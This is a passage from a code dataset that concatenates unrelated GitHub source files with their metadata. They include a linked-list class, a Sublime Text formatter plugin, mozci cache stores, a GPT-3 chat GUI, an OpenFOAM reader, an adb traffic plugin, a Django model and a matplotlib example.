spaceHeld = True\r\n    else:\r\n        spaceHeld = False\r\n\r\ndef asteroid_movement():\r\n    for asteroid in map_info:\r\n        asteroid.draw(screen)\r\n        track = asteroid.move()\r\n        if track > width + 100:\r\n            map_info.remove(asteroid)\r\n    if len(map_info) <= 0:\r\n        pygame.quit()\r\n        quit() #eventually make this return a boolean for whether or not map is done to end the gameloop process/do menu stuff\r\n","repo_name":"code-scary/rhythm-game","sub_path":"rhythm game/game_actions.py","file_name":"game_actions.py","file_ext":"py","file_size_in_byte":1811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"26889674396","text":"class Node():\t# declare a node\n\tdef __init__(self, data, next = None):\n\t\tself.data = data\n\t\tself.next = next\n \nclass SimplyLinkedList():\n\tdef __init__(self):\n\t\tself.head = None\n \n\tdef link(self, node, next): # link node to next\n\t\tnode.next = next\n \n\tdef getTail(self): # fetch the tail node\n\t\tcurrentNode = self.head\n\t\twhile 
currentNode.next:\n\t\t\tcurrentNode = currentNode.next\n\t\treturn currentNode\n \n\tdef getIndex(self, data): # return the index of data\n\t\tcurrentNode = self.head\n\t\tindex = 0\n\t\twhile currentNode.data != data:\n\t\t\tcurrentNode = currentNode.next\n\t\t\tindex += 1\n\t\treturn index\n \n\tdef getNum(self, index):\t# return the value at index\n\t\tcurrentNode = self.head\n\t\tfor i in range(index):\n\t\t\tprevNode = currentNode\n\t\t\tcurrentNode = currentNode.next\n\t\treturn currentNode.data\n \n\tdef append(self, data): # append at the tail; if the list is empty, at the head\n\t\tif self.head == None:\n\t\t\tself.head = Node(data) \n\t\telse:\n\t\t\ttail = self.getTail()\n\t\t\ttail.next = Node(data)\n \n\tdef appendhead(self, data): # insert at the head\n\t\tself.head = Node(data, self.head)\n \n\tdef insertAt(self, data, index):\t# insert at this index\n\t\tcurrentNode = self.head\n\t\tfor i in range(index):\n\t\t\tprevNode = currentNode\n\t\t\tcurrentNode = currentNode.next\n\t\tprevNode.next = Node(data)\n\t\tself.link(prevNode.next, currentNode)\n \n\tdef insertBeforeThisNumber(self, data, target_num): # insert before this value\n\t\tcurrentNode = self.head\n\t\twhile currentNode.data != target_num:\n\t\t\tprevNode = currentNode\n\t\t\tcurrentNode = currentNode.next\n\t\tprevNode.next = Node(data)\n\t\tself.link(prevNode.next, currentNode)\n \n\tdef insertAfterThisNumber(self, data, target_num): # insert after this value\n\t\tcurrentNode = self.head\n\t\twhile currentNode.data != target_num:\n\t\t\tprevNode = currentNode\n\t\t\tcurrentNode = currentNode.next\n\t\tprevNode = currentNode\n\t\tcurrentNode = currentNode.next\n\t\tprevNode.next = Node(data)\n\t\tself.link(prevNode.next, currentNode)\n \n\tdef pop(self):\t# delete the last node\n\t\tcurrentNode = self.head\n\t\twhile currentNode.next:\n\t\t\tprevNode = currentNode\n\t\t\tcurrentNode = currentNode.next\n\t\tprevNode.next = None\n \n\tdef pophead(self):\t# delete the first node\n\t\theadNode = self.head\n\t\tself.head = self.head.next\n\t\theadNode.next = None\n \n\tdef popAt(self, index):\t# pop the node at a specific index\n\t\tcurrentNode = self.head\n\t\tfor i in range(index):\n\t\t\tprevNode = currentNode\n\t\t\tcurrentNode = currentNode.next\n\t\tif currentNode.next:\n\t\t\tself.link(prevNode, currentNode.next)\n\t\t\tcurrentNode = None\n \n\tdef popIt(self, data):\t# pop the node holding a specific value\n\t\tif self.head.data == data:\n\t\t\tself.pophead()\n\t\t\treturn\n\t\tcurrentNode = self.head\n\t\twhile currentNode.data != data:\n\t\t\tprevNode = currentNode\n\t\t\tcurrentNode = currentNode.next\n\t\tself.link(prevNode, currentNode.next)\n \n\tdef printList(self):\t# print the list\n\t\tcurrentNode = self.head\n\t\twhile currentNode.next:\n\t\t\tprint(currentNode.data)\n\t\t\tcurrentNode = currentNode.next\n\t\tprint(currentNode.data)\n \n\tdef listMerge(self, nextList):\t# merge lists\n\t\ttail = self.getTail()\n\t\tself.link(tail, nextList.head)\n \nnode1 = Node(7)\t# create a node holding 7\nnode2 = Node(3) # create a node holding 3\n\nList1 = SimplyLinkedList() # create list 1\nList2 = SimplyLinkedList() # create list 2\n\nList1.head = node1 \t # set List1's head to node1\nList1.link(node1, node2)\t# make node2 the next node of node1\nList2.append(4)\t\t\t\t# append a node holding 4 to List2\nList1.appendhead(780)\t\t# make a node holding 780 the new head of List1\nList2.insertAfterThisNumber(60, 4) # insert 60 after 4 in List2\nList1.insertAt(68, 1) # put a node holding 68 at index 1 of List1 (existing values shift back)\nList2.append(200)\t # append a node holding 200 at the end of List2\nList2.popAt(1)\t\t # remove the node at index 1 of List2 (the node holding 60)\nList1.listMerge(List2)# merge (link) List1 and List2\n\nList1.printList()\t # print 
출력","repo_name":"fudoge/BOJ-practice","sub_path":"linked_list.py","file_name":"linked_list.py","file_ext":"py","file_size_in_byte":3996,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"37166593339","text":"import sublime\nimport sublime_plugin\nimport subprocess\nimport os\nimport re\nimport shutil\n# import inspect\n\nSETTINGS_FILE = \"SemiStandardFormat.sublime-settings\"\n\n# load settings\nsettings = None\nplatform = sublime.platform()\nglobal_path = os.environ[\"PATH\"]\nselectors = {}\n\nSYNTAX_RE = re.compile(r'(?i)/([^/]+)\\.(?:tmLanguage|sublime-syntax)$')\n\n# Initialize a global path. Works on all OSs\n\n\ndef calculate_user_path():\n \"\"\"execute a user shell to return a real env path\"\"\"\n shell_command = settings.get(\"get_path_command\")\n user_path = (\n subprocess.check_output(shell_command)\n .decode(\"utf-8\")\n .split('\\n')[0]\n )\n return user_path\n\n\ndef search_for_bin_paths(path, view_path_array=[]):\n dirname = path if os.path.isdir(path) else os.path.dirname(path)\n maybe_bin_path = os.path.join(dirname, 'node_modules', '.bin')\n found_path = os.path.isdir(maybe_bin_path)\n if found_path:\n view_path_array = view_path_array + [maybe_bin_path]\n return (\n view_path_array if os.path.ismount(dirname)\n else search_for_bin_paths(os.path.dirname(dirname), view_path_array)\n )\n\n\ndef get_view_path(path_string):\n \"\"\"\n walk the fs from the current view to find node_modules/.bin\n \"\"\"\n project_path = search_for_bin_paths(path_string)\n return os.pathsep.join(project_path)\n\n\ndef get_project_path(view):\n \"\"\"\n generate path of node_module/.bin for open project folders\n \"\"\"\n parent_window_folders = view.window().folders()\n project_path = (\n [get_view_path(folder) for folder in parent_window_folders] if\n parent_window_folders\n else []\n )\n return os.pathsep.join(list(filter(None, project_path)))\n\n\ndef generate_search_path(view):\n \"\"\"\n run necessary work to generate a search path\n \"\"\"\n search_path = settings.get(\"PATH\")\n if not isinstance(search_path, list):\n print(\"SemiStandardFormat: PATH in settings does not appear to be an array\")\n search_path = []\n if settings.get(\"use_view_path\"):\n if view.file_name():\n search_path = search_path + [get_view_path(view.file_name())]\n elif settings.get(\"use_project_path_fallback\"):\n search_path = search_path + [get_project_path(view)]\n if settings.get(\"use_global_path\"):\n search_path = search_path + [global_path]\n search_path = list(filter(None, search_path))\n new_path = os.pathsep.join(search_path)\n\n return new_path\n\n\ndef get_command(commands):\n \"\"\"\n Tries to validate and return a working formatting command\n \"\"\"\n for command in commands:\n if shutil.which(command[0]):\n return command\n return None\n\n\ndef print_status(global_path, search_path):\n command = get_command(settings.get(\"commands\"))\n print(\"SemiStandardFormat:\")\n print(\" global_path: {}\".format(global_path))\n print(\" search_path: {}\".format(search_path))\n if command:\n print(\" found {} at {}\".format(command[0], shutil.which(command[0])))\n print(\" command: {}\".format(command))\n if settings.get(\"check_version\"):\n print(\n \" {} version: {}\"\n .format(command[0], command_version(command[0]))\n )\n\n\ndef plugin_loaded():\n \"\"\"\n perform some work to set up env correctly.\n \"\"\"\n global global_path\n global settings\n settings = sublime.load_settings(SETTINGS_FILE)\n view = 
sublime.active_window().active_view()\n if platform != \"windows\":\n global_path = calculate_user_path()\n search_path = generate_search_path(view)\n os.environ[\"PATH\"] = search_path\n print_status(global_path, search_path)\n\n\nclass SemiStandardFormatEventListener(sublime_plugin.EventListener):\n\n def on_pre_save(self, view):\n if settings.get(\"format_on_save\") and is_javascript(view):\n os.chdir(os.path.dirname(view.file_name()))\n view.run_command(\"semi_standard_format\")\n\n def on_activated_async(self, view):\n search_path = generate_search_path(view)\n os.environ[\"PATH\"] = search_path\n if is_javascript(view) and settings.get(\"logging_on_view_change\"):\n print_status(global_path, search_path)\n\n\ndef is_javascript(view):\n \"\"\"\n Checks if the current view is JS or not. Used in pre_save event.\n \"\"\"\n # Check the file extension\n name = view.file_name()\n extensions = set(settings.get('extensions'))\n if name and os.path.splitext(name)[1][1:] in extensions:\n return True\n # If it has no name (?) or it's not a JS, check the syntax\n syntax = view.settings().get(\"syntax\")\n if syntax and \"javascript\" in syntax.split(\"/\")[-1].lower():\n return True\n return False\n\n\ndef semistandard_format(string, command):\n \"\"\"\n Uses subprocess to format a given string.\n \"\"\"\n\n startupinfo = None\n\n if platform == \"windows\":\n # Prevent cmd.exe window from popping up\n startupinfo = subprocess.STARTUPINFO()\n startupinfo.dwFlags |= (\n subprocess.STARTF_USESTDHANDLES | subprocess.STARTF_USESHOWWINDOW\n )\n startupinfo.wShowWindow = subprocess.SW_HIDE\n\n std = subprocess.Popen(\n command,\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n startupinfo=startupinfo\n )\n\n std.stdin.write(bytes(string, 'UTF-8'))\n out, err = std.communicate()\n print(err)\n return out.decode(\"utf-8\"), None\n\n\ndef command_version(command):\n \"\"\"\n Uses subprocess to format a given string.\n \"\"\"\n\n startupinfo = None\n\n if platform == \"windows\":\n # Prevent cmd.exe window from popping up\n startupinfo = subprocess.STARTUPINFO()\n startupinfo.dwFlags |= (\n subprocess.STARTF_USESTDHANDLES | subprocess.STARTF_USESHOWWINDOW\n )\n startupinfo.wShowWindow = subprocess.SW_HIDE\n\n std = subprocess.Popen(\n [command, \"--version\"],\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n startupinfo=startupinfo\n )\n out, err = std.communicate()\n return out.decode(\"utf-8\").replace(\"\\r\", \"\"), err\n\n\nclass SemiStandardFormatCommand(sublime_plugin.TextCommand):\n\n def run(self, edit):\n # Figure out if the desired formatter is available\n command = get_command(settings.get(\"commands\"))\n if platform == \"windows\" and command is not None:\n # Windows hax\n command[0] = shutil.which(command[0])\n if not command:\n # Noop if we don't have the right tools.\n return None\n view = self.view\n\n view_syntax = view.settings().get('syntax', '')\n\n if view_syntax:\n match = SYNTAX_RE.search(view_syntax)\n\n if match:\n view_syntax = match.group(1).lower()\n else:\n view_syntax = ''\n\n if view_syntax and view_syntax in settings.get('extensions', []):\n selectors = settings.get(\"selectors\")\n selector = selectors[view_syntax]\n else:\n selector = None\n\n os.chdir(os.path.dirname(view.file_name()))\n\n regions = []\n # sel = view.sel()\n\n if selector:\n regions = view.find_by_selector(selector)\n else:\n allreg = sublime.Region(0, view.size())\n regions.append(allreg)\n\n for region in regions:\n self.do_format(edit, 
region, view, command)\n\n def do_format(self, edit, region, view, command):\n s = view.substr(region)\n s, err = semistandard_format(s, command)\n if not err and len(s) > 0:\n view.replace(edit, region, s)\n elif err:\n loud = settings.get(\"loud_error\")\n msg = 'SemiStandardFormat: error formatting selection(s)'\n print(msg)\n if settings.get(\"log_errors\"):\n print(err)\n sublime.error_message(msg) if loud else sublime.status_message(msg)\n\n\nclass ToggleSemiStandardFormatCommand(sublime_plugin.TextCommand):\n\n def run(self, edit):\n if settings.get('format_on_save', False):\n settings.set('format_on_save', False)\n sublime.status_message(\"Format on save: Off\")\n else:\n settings.set('format_on_save', True)\n sublime.status_message(\"Format on save: On\")\n sublime.save_settings(SETTINGS_FILE)\n\n def is_checked(self):\n return settings.get('format_on_save', False)\n","repo_name":"ppxu/sublime-semistandard-format","sub_path":"semistandard-format.py","file_name":"semistandard-format.py","file_ext":"py","file_size_in_byte":8472,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"72021901593","text":"# -*- coding: utf-8 -*-\nimport os\nimport pickle\nimport shutil\nimport tarfile\nimport tempfile\nimport threading\nfrom distutils.dir_util import copy_tree\n\nimport taskcluster\nfrom cachy.contracts.store import Store\nfrom cachy.serializers import Serializer\nfrom cachy.stores import FileStore, NullStore # noqa\nfrom loguru import logger\n\nfrom mozci.util.req import get_session\nfrom mozci.util.taskcluster import get_taskcluster_options\n\n\ndef extract_tar_zst(path, dest):\n import zstandard\n\n dctx = zstandard.ZstdDecompressor()\n with open(path, \"rb\") as f:\n with dctx.stream_reader(f) as reader:\n with tarfile.open(mode=\"r|\", fileobj=reader) as tar:\n tar.extractall(dest)\n\n\nclass SeededFileStore(FileStore):\n RESEED_KEY = \"mozci:SeededFileStore:reseed\"\n\n def __init__(self, config):\n \"\"\"A FileStore instance that allows pre-seeding the cache from an archive\n downloaded from a URL.\n\n Example configuration:\n\n file = {\n driver = \"seeded-file\",\n path = \"/path/to/cache\",\n url = \"https://example.com/cache.tar.gz\"\n }\n\n Configuration can include:\n\n path: Path on the local file system to store the cache.\n url: Where to download the preseed data from.\n archive_relpath: Path within the archive pointing to the root of the cache data.\n reseed_interval: Time in minutes after which the data will be\n seeded again (defaults to no reseeding).\n\n Supported archive formats include `.zip`, `.tar`, `.tar.gz`, `.tar.bz2` or `.tar.zst`.\n \"\"\"\n self._url = config[\"url\"]\n self._reseed_interval = config.get(\"reseed_interval\", 0)\n self._archive_relpath = config.get(\"archive_relpath\")\n\n self._session = get_session()\n\n kwargs = {\n \"directory\": config[\"path\"],\n }\n if \"hash_type\" in config:\n kwargs[\"hash_type\"] = config[\"hash_type\"]\n\n super(SeededFileStore, self).__init__(**kwargs)\n\n def seed(self):\n \"\"\"Download and extract the seed data to the cache directory.\"\"\"\n logger.info(\n f\"Seeding mozci cache at {self._directory} with contents from {self._url}\"\n )\n self._create_cache_directory(self._directory)\n\n filename = self._url.split(\"/\")[-1]\n with self._session.get(self._url, stream=True) as r:\n r.raise_for_status()\n\n with tempfile.TemporaryDirectory() as tempdir:\n with tempfile.NamedTemporaryFile(suffix=filename) as fh:\n shutil.copyfileobj(r.raw, fh)\n\n if 
filename.endswith(\".tar.zst\"):\n extract_tar_zst(fh.name, tempdir)\n else:\n shutil.unpack_archive(fh.name, tempdir)\n\n path = tempdir\n if self._archive_relpath:\n path = os.path.join(tempdir, self._archive_relpath)\n\n copy_tree(path, self._directory)\n\n # Make sure we don't reseed again for another 'reseed_interval' minutes.\n self.put(self.RESEED_KEY, False, self._reseed_interval)\n\n def get(self, key):\n reseed = super(SeededFileStore, self).get(self.RESEED_KEY)\n if reseed is None:\n self.seed()\n\n return super(SeededFileStore, self).get(key)\n\n\nclass RenewingFileStore(FileStore):\n def __init__(self, config, retention):\n \"\"\"A FileStore instance that renews items in the cache when they are\n accessed again.\n \"\"\"\n kwargs = {\n \"directory\": config[\"path\"],\n }\n if \"hash_type\" in config:\n kwargs[\"hash_type\"] = config[\"hash_type\"]\n\n self.retention = retention\n\n super(RenewingFileStore, self).__init__(**kwargs)\n\n def get(self, key):\n value = super(RenewingFileStore, self).get(key)\n if value is None:\n return None\n\n self.put(key, value, self.retention)\n return value\n\n\ndef get_s3_credentials(bucket, prefix):\n auth = taskcluster.Auth(get_taskcluster_options())\n response = auth.awsS3Credentials(\"read-write\", bucket, prefix)\n return response[\"credentials\"]\n\n\nS3_CLIENTS_LOCK = threading.Lock()\nS3_CLIENTS = {}\n\n\ndef get_s3_client(bucket, prefix):\n import boto3\n\n with S3_CLIENTS_LOCK:\n if (bucket, prefix) not in S3_CLIENTS:\n credentials = get_s3_credentials(bucket, prefix)\n S3_CLIENTS[(bucket, prefix)] = boto3.client(\n \"s3\",\n aws_access_key_id=credentials[\"accessKeyId\"],\n aws_secret_access_key=credentials[\"secretAccessKey\"],\n aws_session_token=credentials[\"sessionToken\"],\n )\n\n return S3_CLIENTS[(bucket, prefix)]\n\n\ndef destroy_s3_client(bucket, prefix):\n with S3_CLIENTS_LOCK:\n del S3_CLIENTS[(bucket, prefix)]\n\n\nclass S3Store(Store):\n def __init__(self, config):\n \"\"\"A Store instance that stores items in S3.\"\"\"\n self._bucket = config[\"bucket\"]\n self._prefix = config[\"prefix\"]\n\n @property\n def _client(self):\n return get_s3_client(self._bucket, self._prefix)\n\n def _key(self, key):\n return os.path.join(self._prefix, key)\n\n def _retry_if_expired(self, op):\n import botocore\n\n try:\n return op()\n except botocore.exceptions.ClientError:\n destroy_s3_client(self._bucket, self._prefix)\n return op()\n\n def _forget(self, key):\n self._client.delete_object(Bucket=self._bucket, Key=self._key(key))\n # Should return False if the item was not present in the cache, but we\n # don't care.\n return True\n\n def forget(self, key):\n return self._retry_if_expired(lambda: self._forget(key))\n\n def _get(self, key):\n import botocore\n\n # Copy the object onto itself to extend its expiration.\n try:\n head = self._client.head_object(Bucket=self._bucket, Key=self._key(key))\n\n # Change its metadata, or Amazon will complain.\n metadata = head[\"Metadata\"]\n metadata[\"id\"] = \"1\" if \"id\" in metadata and metadata[\"id\"] == \"0\" else \"0\"\n\n self._client.copy_object(\n Bucket=self._bucket,\n CopySource={\"Bucket\": self._bucket, \"Key\": self._key(key)},\n Key=self._key(key),\n Metadata=metadata,\n MetadataDirective=\"REPLACE\",\n )\n except botocore.exceptions.ClientError as ex:\n if ex.response[\"Error\"][\"Code\"] == \"404\":\n return None\n raise\n\n response = self._client.get_object(Bucket=self._bucket, Key=self._key(key))\n data = response[\"Body\"].read()\n try:\n return 
self.unserialize(data)\n except Exception:\n # The object is broken, let's delete it.\n self.forget(key)\n return None\n\n def get(self, key):\n return self._retry_if_expired(lambda: self._get(key))\n\n def _put(self, key, value):\n self._client.put_object(\n Body=self.serialize(value), Bucket=self._bucket, Key=self._key(key)\n )\n\n def put(self, key, value, minutes):\n self._retry_if_expired(lambda: self._put(key, value))\n\n\nclass CompressedPickleSerializer(Serializer):\n def __init__(self):\n import zstandard\n\n self.compressor = zstandard.ZstdCompressor(\n level=zstandard.MAX_COMPRESSION_LEVEL\n )\n self.decompressor = zstandard.ZstdDecompressor()\n\n def serialize(self, data):\n return self.compressor.compress(pickle.dumps(data))\n\n def unserialize(self, data):\n return pickle.loads(self.decompressor.decompress(data))\n","repo_name":"bxbrenden/groenmaker","sub_path":"mozci/util/cache_stores.py","file_name":"cache_stores.py","file_ext":"py","file_size_in_byte":7787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"24015686280","text":"import PySimpleGUI as Sg\nimport openai\nimport logging.config\nimport time\n\n\ndef create_layout(religions):\n layout = [\n [Sg.Text('Parameters Setting', font=('Helvetica', 20))],\n [Sg.Text('Nice Mode:'), Sg.Checkbox('ON', key=\"-niceModeOn-\")],\n [Sg.Text('Discussion between:'), Sg.Checkbox('human & 1 robot', key=\"-humanRobot-\"),\n Sg.Checkbox('2 robots', key=\"-twoRobots-\")],\n [Sg.Text('Religion:'), Sg.Text('robot 1'), Sg.Combo(religions, key=\"-religion1-\"), Sg.Text('robot 2'),\n Sg.Combo(religions, key=\"-religion2-\")],\n [Sg.Text('Discussion:', font=('Helvetica', 35))],\n [Sg.Output(key=\"-print-\", size=(180, 35))],\n [Sg.Button(\"Start\"), Sg.Button(\"Clear\")]\n ]\n return layout\n\n\ndef gpt3_call(prompt_text):\n response = openai.Completion.create(\n engine=\"davinci\",\n prompt=prompt_text,\n temperature=0.7,\n max_tokens=150,\n top_p=1,\n frequency_penalty=0.4,\n presence_penalty=0.4,\n stop=[\"Human:\", \"\\n\"],\n )\n story = response['choices'][0]['text']\n if str(story) == \"\" or not str(story):\n story = \"I don't know, can you elaborate?\"\n return prompt_text + str(story)\n\n\ndef run(config, intro=None):\n logger = logging.getLogger(__name__)\n logger.info('Start logging:')\n religions = list(config['religions'].keys())\n layout = create_layout(religions)\n window = Sg.Window('Deus Ex Machina Demo', layout=layout, scaling=2)\n while True:\n event, values = window.read()\n if event in (Sg.WIN_CLOSED, 'Quit'):\n break\n if event == 'Clear':\n window[\"-print-\"].update(\"\")\n if event == 'Start' and values[\"-humanRobot-\"]:\n window.Element('-religion2-').Update(visible=False)\n window.Element('-twoRobots-').Update(visible=False)\n if intro is None:\n intro = config[\"religions\"][values[\"-religion1-\"]]\n window[\"-print-\"].update(intro)\n question = Sg.popup_get_text(\"Your input: \")\n restart_sequence = \"Human: \"\n start_sequence = values[\"-religion1-\"]\n prompt_text = f'{intro}\\n{restart_sequence}: {question}\\n{start_sequence}:'\n intro = gpt3_call(prompt_text)\n window[\"-print-\"].update(intro)\n if event == 'Start' and values[\"-twoRobots-\"]:\n window.Element('-humanRobot-').Update(visible=False)\n restart_sequence = values[\"-religion1-\"]\n start_sequence = values[\"-religion2-\"]\n question = Sg.popup_get_text(\"Subject: \")\n intro = \"The {} religion is {}. 
\\n\" \\\n \"The {} religion is {}.\\n\" \\\n \"The following is a conversation between {} and {} about {}.\"\\\n .format(values[\"-religion1-\"],\n config[\"religions\"][values[\"-religion1-\"]],\n values[\"-religion2-\"],\n config[\"religions\"][values[\"-religion2-\"]],\n values[\"-religion2-\"],\n values[\"-religion1-\"],\n question)\n #prompt_text = f'{intro}\\n{start_sequence}: '\n prompt_text = \"{}\\n{}: \".format(intro, start_sequence)\n intro = gpt3_call(prompt_text)\n window[\"-print-\"].update(intro)\n turn = True\n for _ in range(12):\n if turn:\n prompt_text = intro + \"\\n\" + restart_sequence + \": \"\n turn = False\n else:\n prompt_text = intro + \"\\n\" + start_sequence + \": \"\n turn = True\n intro = gpt3_call(prompt_text)\n window[\"-print-\"].update(intro)\n window.Refresh()\n","repo_name":"mahakhat/APIhero","sub_path":"view/front.py","file_name":"front.py","file_ext":"py","file_size_in_byte":3782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"25777413005","text":"\"\"\"\nBase interface for a reader class\n\"\"\"\nimport logging\n\nimport numpy as np\n\nfrom pydelling.readers import BaseReader\n\nlogger = logging.getLogger(__name__)\nimport Ofpp\nfrom pydelling.config import config\nimport logging\nfrom pathlib import Path\n\nlogger = logging.getLogger(__name__)\n\n\nclass OpenFoamReader(BaseReader):\n def __init__(self, filename=None):\n self.filename = Path(filename) if filename else Path(config.open_foam_reader.filename)\n logger.info(f\"Reading OpenFOAM mesh file from {self.filename}\")\n super().__init__(filename=self.filename)\n\n\n def open_file(self, filename):\n self.mesh = Ofpp.FoamMesh(self.filename)\n\n @property\n def cell_centers(self) -> np.array:\n if not config.globals.is_cell_centers_read:\n try:\n self.mesh.read_cell_centres(str(self.filename / \"0/C\"))\n logger.info(f\"Reading cell center locations from {self.filename / '0/C'}\")\n config.globals.is_cell_centers_read = True\n except:\n logger.info(f\"Reading cell center locations from {self.filename / 'constant/C'}\")\n self.mesh.read_cell_centres(str(self.filename / \"constant/C\"))\n config.globals.is_cell_centers_read = True\n\n return self.mesh.cell_centres\n\n @property\n def cell_volumes(self) -> np.array:\n if not config.globals.is_cell_volumes_read:\n try:\n self.mesh.read_cell_volumes(str(self.filename / \"0/V\"))\n logger.info(f\"Reading cell volume locations from {self.filename / '0/V'}\")\n config.globals.is_cell_volumes_read = True\n except:\n logger.info(f\"Reading cell volume locations from {self.filename / 'constant/V'}\")\n self.mesh.read_cell_volumes(str(self.filename / \"constant/V\"))\n config.globals.is_cell_volumes_read = True\n\n return self.mesh.cell_volumes\n\n def get_data(self) -> np.ndarray:\n \"\"\"\n Outputs the read data\n :return:\n \"\"\"\n return np.array(0)\n\n def build_info(self):\n \"\"\"\n Generates a dictionary containing the basic info of the read data\n :return:\n \"\"\"\n self.info = {}\n\n","repo_name":"aitirga/pydelling","sub_path":"pydelling/readers/OpenFoamReader.py","file_name":"OpenFoamReader.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"5"} +{"seq_id":"40770189877","text":"# Standard library imports\nimport sys\nimport os\nfrom datetime import datetime\n\n# Update sys.path for local application imports\nsys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '', '..', 
'..')))\n\n# Local application/library specific imports\nfrom utilities.report_email import Email\nfrom utilities.logger import Logger\n\n\nclass ReportManager:\n def __init__(self):\n #self.email = Email() # disabled: note that send_email_report() still expects self.email to be set\n self.logger = Logger().get_logger()\n\n def log_trade_data(self, trading_data):\n # Construct the trade report string\n trade_report = \"\\n\" + 100 * \"-\" + \"\\n\"\n trade_report += \"{} | {}\\n\".format(trading_data[\"time\"], trading_data[\"trade_action\"])\n trade_report += \"Strategies: {}\\n\".format(trading_data[\"strategy_names\"])\n trade_report += \"Ticker: {}\\n\".format(trading_data[\"ticker\"])\n trade_report += \"{} | Base_Units = {} | Quote_Units = {} | Price = {} \\n\".format(trading_data[\"time\"],\n trading_data[\"base_units\"],\n trading_data[\"quote_units\"],\n trading_data[\"price\"])\n trade_report += \"{} | Profit = {} | CumProfits = {} \\n\".format(trading_data[\"time\"],\n trading_data[\"real_profit\"],\n trading_data[\"cumulative_profits\"])\n trade_report += 100 * \"-\" + \"\\n\"\n\n # Log the trade report\n self.logger.info(trade_report)\n\n def send_email_report(self, trading_data):\n now = datetime.now()\n # If it's the beginning of an hour divisible by 4, send the email\n if now.hour % 4 == 0 and now.minute == 0:\n # Enhanced email content for clarity and better presentation\n text = f\"\"\"Trading Report:\n--------------------------------\nTime: {now.strftime('%Y-%m-%d %H:%M:%S')}\nAction: {trading_data[\"trade_action\"]}\nNumber of Trades: {trading_data[\"total_trades\"]}\nProfit: {trading_data[\"real_profit\"]}\nCumulative Profits: {trading_data[\"cumulative_profits\"]}\n--------------------------------\nThank you for using our trading system.\n\"\"\"\n self.email.send_email(text)\n\n\n\n","repo_name":"Usam95/backtester","sub_path":"deployment/binance/report_manager.py","file_name":"report_manager.py","file_ext":"py","file_size_in_byte":2404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"33889005784","text":"\"\"\"\nGiven a list of integers and a single sum value, return the first two values (parse from the left please)\nin order of appearance that add up to form the sum.\n\"\"\"\n\n\ndef sum_pairs(lst, s):\n cache = set()\n for i in lst:\n if s - i in cache:\n return [s - i, i]\n cache.add(i)\n\n\nprint(sum_pairs([11, 3, 7, 5], 10)) # e.g. 3 + 7 == 10, so this prints [3, 7]","repo_name":"CapMath/Codewars_Python","sub_path":"5kyu/Sum of pairs.py","file_name":"Sum of pairs.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"5304274927","text":"import re\nfrom collections import namedtuple\n\nfrom ppadb.plugins import Plugin\n\nState = namedtuple(\"TrafficState\", [\n 'idx',\n 'iface',\n 'acct_tag_hex',\n 'uid_tag_int',\n 'cnt_set',\n 'rx_bytes',\n 'rx_packets',\n 'tx_bytes',\n 'tx_packets',\n 'rx_tcp_bytes',\n 'rx_tcp_packets',\n 'rx_udp_bytes',\n 'rx_udp_packets',\n 'rx_other_bytes',\n 'rx_other_packets',\n 'tx_tcp_bytes',\n 'tx_tcp_packets',\n 'tx_udp_bytes',\n 'tx_udp_packets',\n 'tx_other_bytes',\n 'tx_other_packets',\n])\n\n\nclass Traffic(Plugin):\n def get_traffic(self, package_name):\n cmd = 'dumpsys package {} | grep userId'.format(package_name)\n result = self.shell(cmd).strip()\n\n pattern = \"userId=([\\d]+)\"\n\n if result:\n match = re.search(pattern, result)\n uid = match.group(1)\n else:\n # This package is not existing\n return None\n\n cmd = 'cat /proc/net/xt_qtaguid/stats | grep {}'.format(uid)\n result = self.shell(cmd)\n\n 
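# helper: cast digit-only stat tokens to int; non-numeric fields such as iface stay strings\n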
def convert(token):\n if token.isdigit():\n return int(token)\n else:\n return token\n\n states = []\n if result:\n for line in result.strip().split('\\n'):\n values = map(convert, line.split())\n states.append(State(*values))\n\n return states\n else:\n return None\n","repo_name":"Swind/pure-python-adb","sub_path":"ppadb/plugins/device/traffic.py","file_name":"traffic.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","stars":503,"dataset":"github-code","pt":"5"} +{"seq_id":"8336182087","text":"from django.db import models\nfrom django.core.validators import MaxValueValidator, MinValueValidator\n\n\n# Create your models here.\nclass Bonus(models.Model):\n class Meta:\n verbose_name_plural = 'Bonuses'\n\n name = models.CharField(max_length=50)\n is_active = models.BooleanField(default=False)\n expires_on = models.DateField()\n description = models.CharField(help_text=\"Describes what the amount is for on a discount by discount basis.\", max_length=256)\n amount = models.IntegerField(validators=[MinValueValidator(1), MaxValueValidator(100)])\n created_at = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return self.name\n","repo_name":"ErikaN-ir/django-fullstack-milestone-project","sub_path":"bag/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"7955657287","text":"\"\"\"\nPlacing text boxes\n==================\n\nWhen decorating axes with text boxes, two useful tricks are to place the text\nin axes coordinates (see :ref:`transforms_tutorial`),\nso the text doesn't move around with changes in x or y limits. You\ncan also use the ``bbox`` property of text to surround the text with a\n`~matplotlib.patches.Patch` instance -- the ``bbox`` keyword argument takes a\ndictionary with keys that are Patch properties.\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nnp.random.seed(19680801)\n\nfig, ax = plt.subplots()\nx = 30*np.random.randn(10000)\nmu = x.mean()\nmedian = np.median(x)\nsigma = x.std()\ntextstr = '\\n'.join((\n r'$\\mu=%.2f$' % (mu, ),\n 